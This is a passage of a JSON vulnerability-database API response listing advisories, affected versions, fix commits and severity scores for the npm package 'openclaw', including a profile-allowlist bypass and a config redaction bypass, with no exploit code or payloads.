                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-35646",
                "GHSA-mf5g-6r6f-ghhm"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dbcw-brhj-k7hs"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90343?format=api",
            "vulnerability_id": "VCID-ddf9-tnrt-r7f2",
            "summary": "OpenClaw: Node browser proxy `allowProfiles` bypass through persistent profile mutation and runtime profile selection\n## Summary\nNode browser proxy `allowProfiles` bypass through persistent profile mutation and runtime profile selection\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Real released allowProfiles bypass through profile mutation and runtime profile selection, fixed and shipped in v2026.3.22+, so keep open for publish rather than close.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.13-1`\n- Patched versions: `>= 2026.3.22`\n- First stable tag containing the fix: `v2026.3.22`\n\n## Fix Commit(s)\n- `eac93507c36ccd0c359fba18fa466ef6448be8a5` — 2026-03-23T00:56:44-07:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.22`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @smaeljaish771 for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/eac93507c36ccd0c359fba18fa466ef6448be8a5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/eac93507c36ccd0c359fba18fa466ef6448be8a5"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h5hg-h7rr-gpf3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h5hg-h7rr-gpf3"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-h5hg-h7rr-gpf3",
                    "reference_id": "GHSA-h5hg-h7rr-gpf3",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-h5hg-h7rr-gpf3"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "GHSA-h5hg-h7rr-gpf3"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ddf9-tnrt-r7f2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89927?format=api",
            "vulnerability_id": "VCID-dfdk-dhwf-9yaj",
            "summary": "OpenClaw: config.get redaction bypass through sourceConfig and runtimeConfig aliases\n## Summary\n\nconfig.get redaction bypass through sourceConfig and runtimeConfig aliases.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.14`\n- Patched versions: `>= 2026.4.14`\n\n## Impact\n\nAn authenticated gateway client with config read access could receive unredacted secrets through alias fields that survived redaction, including provider API keys, gateway auth material, and channel credentials.\n\n## Technical Details\n\nThe fix explicitly overwrites `sourceConfig` and `runtimeConfig` with the same redacted copies used for `resolved` and `config`, including the invalid-snapshot branch. Tests now cover both alias fields.\n\n## Fix\n\nThe issue was fixed in #66030. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `86734ef93a2f25063371b04f1946eb300548acd4`\n- PR: #66030\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43528",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00081",
                            "scoring_system": "epss",
                            "scoring_elements": "0.24058",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00094",
                            "scoring_system": "epss",
                            "scoring_elements": "0.26208",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00094",
                            "scoring_system": "epss",
                            "scoring_elements": "0.26253",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43528"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/86734ef93a2f25063371b04f1946eb300548acd4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
